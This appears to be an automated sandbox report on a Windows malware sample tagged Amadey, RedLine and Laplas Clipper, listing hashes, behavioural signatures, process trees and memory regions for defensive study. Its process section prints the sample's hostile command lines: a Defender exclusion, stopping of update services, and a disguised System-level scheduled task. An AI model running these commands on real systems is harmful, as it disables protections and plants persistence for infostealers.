Malware Analysis Report

2024-10-19 01:10

Sample ID 230729-fgaghsbf5w
Target 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
Tags
amadey laplas redline clipper evasion infostealer persistence spyware stealer themida trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847

Threat Level: Known bad

The file 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847 was found to be: Known bad.

Malicious Activity Summary

RedLine payload

Amadey

Laplas Clipper

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Themida packer

Checks BIOS information in registry

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

GoLang User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-29 04:50

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-29 04:50

Reported

2023-07-29 04:55

Platform

win7-20230712-en

Max time kernel

185s

Max time network

303s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Program Files\Google\Chrome\updater.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1648 set thread context of 1976 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3036 set thread context of 2424 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 3036 set thread context of 1364 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60b1dd54d8c1d901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2764 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2764 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 1760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2224 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2764 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 2764 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 2764 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1900 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 1060 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1900 wrote to memory of 1972 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 2280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1900 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

"C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {E3AF431A-CB8C-4FC7-96DD-748EC797B6AA} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1]

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {8B9E8347-A8FA-422B-BBD1-6FFAE0BE7D22} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

Network


Files

SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/2568-142-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-144-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-146-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-145-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-147-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2764-150-0x0000000000890000-0x0000000001331000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/2764-151-0x0000000004550000-0x000000000539A000-memory.dmp

memory/2568-149-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-148-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/2764-155-0x0000000004670000-0x0000000004FB3000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/860-158-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-164-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-163-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-162-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-161-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-160-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-159-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/2568-157-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/860-156-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-167-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-169-0x00000000008B0000-0x00000000011F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/860-168-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-166-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-165-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/1092-176-0x00000000023C0000-0x00000000023C8000-memory.dmp

memory/1092-177-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/1092-179-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1092-178-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1092-180-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/1648-181-0x0000000074140000-0x000000007482E000-memory.dmp

memory/1092-182-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/2568-183-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/1092-175-0x000000001B020000-0x000000001B302000-memory.dmp

memory/1092-185-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/2568-184-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/1092-186-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/2764-188-0x0000000004550000-0x000000000539A000-memory.dmp

memory/860-189-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-190-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-191-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/860-193-0x00000000008B0000-0x00000000011F3000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H7W8DGSO7GUP79CBECNI.temp

MD5 f0492bc602768244b35fd12d2bb06629
SHA1 b3965c328a99a726e2d0d1a15d18ebd0fad6bd7a
SHA256 a8ea72ac05cd4fd0c5de31232b77f908bfc6daefe1b6d7518c0053d944b21ed0
SHA512 3759100e54f64ba3b71364c4a63c7681f06a15b5e00a6a4a78e3958e4d8a33804014a45b7f9153d7ba466e7a79d9347135539217c90ea16ede060b0e4ee2c479

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f0492bc602768244b35fd12d2bb06629
SHA1 b3965c328a99a726e2d0d1a15d18ebd0fad6bd7a
SHA256 a8ea72ac05cd4fd0c5de31232b77f908bfc6daefe1b6d7518c0053d944b21ed0
SHA512 3759100e54f64ba3b71364c4a63c7681f06a15b5e00a6a4a78e3958e4d8a33804014a45b7f9153d7ba466e7a79d9347135539217c90ea16ede060b0e4ee2c479

memory/1648-194-0x0000000000FA0000-0x0000000000FE0000-memory.dmp

memory/1648-200-0x0000000000380000-0x000000000039C000-memory.dmp

memory/1896-204-0x0000000002320000-0x0000000002328000-memory.dmp

memory/1896-201-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/1896-202-0x000000001B240000-0x000000001B522000-memory.dmp

memory/2568-205-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/1896-207-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1896-208-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1896-203-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1896-206-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/1648-209-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1896-210-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1648-211-0x0000000000380000-0x0000000000395000-memory.dmp

memory/860-212-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/1648-214-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-216-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-218-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-220-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-222-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-224-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-226-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-228-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-230-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-232-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-234-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-235-0x00000000004E0000-0x00000000004E1000-memory.dmp

memory/1896-236-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2568-240-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/2568-239-0x000000013F110000-0x000000013FF5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/1976-242-0x0000000000400000-0x000000000045A000-memory.dmp

memory/1648-245-0x0000000000FA0000-0x0000000000FE0000-memory.dmp

memory/1976-258-0x0000000074140000-0x000000007482E000-memory.dmp

memory/1976-259-0x0000000000400000-0x000000000045A000-memory.dmp

memory/1648-260-0x0000000074140000-0x000000007482E000-memory.dmp

